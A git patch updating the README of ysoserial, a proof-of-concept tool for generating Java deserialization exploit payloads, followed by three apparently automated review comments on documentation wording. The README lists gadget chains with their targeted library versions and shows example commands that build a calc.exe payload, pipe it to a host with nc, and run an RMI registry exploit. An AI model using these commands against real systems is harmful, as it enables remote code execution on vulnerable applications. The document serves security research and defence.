From ed18a40523887525fd717e3347262b6df31c43f5 Mon Sep 17 00:00:00 2001 From: Chris Frohoff Date: Tue, 26 Jan 2016 17:27:19 -0800 Subject: [PATCH] updated README --- README.md | 22 +++++++++++++--------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/README.md b/README.md index 82faeb78..30501436 100644 --- a/README.md +++ b/README.md @@ -7,7 +7,8 @@ A proof-of-concept tool for generating payloads that exploit unsafe Java object ## Description -Released as part of AppSecCali 2015 Talk ["Marshalling Pickles: how deserializing objects will ruin your day"](http://frohoff.github.io/appseccali-marshalling-pickles/) +Released as part of AppSecCali 2015 Talk ["Marshalling Pickles: how deserializing objects will ruin your day"](http://frohoff.github.io/appseccali-marshalling-pickles/). +Updated to include a [JRE <= 1.7u21 gadget chain](https://gist.github.com/frohoff/24af7913611f8406eaf3). __ysoserial__ is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing __unsafe deserialization__ of objects. 
@@ -28,20 +29,23 @@ are not responsible or liable for misuse of the software. Use responsibly. ## Usage ```shell -$ java -jar ysoserial-0.0.1-all.jar +$ java -jar ysoserial-0.0.3-all.jar Y SO SERIAL? Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]' Available payload types: - CommonsCollections1 - CommonsCollections2 - Groovy1 - Spring1 + CommonsCollections1 [commons-collections:commons-collections:3.1] + CommonsCollections2 [org.apache.commons:commons-collections4:4.0] + CommonsCollections3 [commons-collections:commons-collections:3.1] + CommonsCollections4 [org.apache.commons:commons-collections4:4.0] + Groovy1 [org.codehaus.groovy:groovy:2.3.9] + Jdk7u21 [] + Spring1 [org.springframework:spring-core:4.1.4.RELEASE, org.springframework:spring-beans:4.1.4.RELEASE] ``` ## Examples ```shell -$ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd +$ java -jar ysoserial-0.0.3-all.jar CommonsCollections1 calc.exe | xxd 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat @@ -50,10 +54,10 @@ $ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd 0000560: 6572 7269 6465 0000 0000 0000 0000 0000 erride.......... 0000570: 0078 7071 007e 003a .xpq.~.: -$ java -jar ysoserial-0.0.1-all.jar Groovy1 calc.exe > groovypayload.bin +$ java -jar ysoserial-0.0.3-all.jar Groovy1 calc.exe > groovypayload.bin $ nc 10.10.10.10 < groovypayload.bin -$ java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe +$ java -cp ysoserial-0.0.3-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe ``` ## Installation
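Review bot: In the first hunk (`@@ -7,7 +7,8 @@`), the new line "Updated to include a JRE <= 1.7u21 gadget chain" should say what makes that chain different from the others listed in this README: the usage hunk shows it with an empty dependency list (`Jdk7u21 []`), meaning it needs no third-party library on the target classpath and is blocked only by running a patched JRE. Since the Description is the part of the README readers use to judge exposure, state that here, e.g. "a JRE <= 1.7u21 gadget chain that requires no third-party libraries (mitigated by updating the JRE)". The link also points at an external gist rather than the payload source in this repository; consider linking the in-repo payload class so the reference does not rot independently of the code. The trailing period added to the preceding sentence is fine.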
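Review bot: In the second hunk (`@@ -28,20 +29,23 @@`), the new bracketed annotations on each payload type are undocumented: nothing in the Usage section says the brackets hold Maven coordinates of the library each chain targets, and `Jdk7u21 []` is ambiguous between "no dependencies" and "not yet filled in". Add a one-line legend under the list, e.g. "Each payload lists the Maven coordinates of the library version it was built and tested against; an empty list means only the JRE is required", and make the empty case explicit, e.g. `Jdk7u21 [] (JRE <= 1.7u21, no third-party libraries)`. The legend should also say whether the listed version (e.g. `commons-collections:commons-collections:3.1`) is the only affected version or just the one bundled for testing, since readers will use this list to triage their own dependency trees. Separately, the example output now hardcodes `ysoserial-0.0.3-all.jar` while the very next line uses the `ysoserial-[version]-all.jar` placeholder; pick one form.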
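Review bot: In the third hunk (`@@ -50,10 +54,10 @@`), the change is three mechanical version bumps from `0.0.1` to `0.0.3`, which together with the Usage hunk makes four hardcoded copies of the jar name that must be edited on every release (this commit is itself the evidence that it gets missed: 0.0.2 was never reflected here). Use the `ysoserial-[version]-all.jar` placeholder that the Usage line already establishes, or a shell variable such as `$ JAR=ysoserial-[version]-all.jar` defined once at the top of the Examples block, so the examples stop going stale. Also, the `nc 10.10.10.10 < groovypayload.bin` and `RMIRegistryExploit myhost 1099` lines are untouched by this change but remain undocumented; a short comment on what each demonstrates (raw socket delivery vs. the RMI registry helper) would help readers who arrive at this README to assess the deserialization entry points these examples cover.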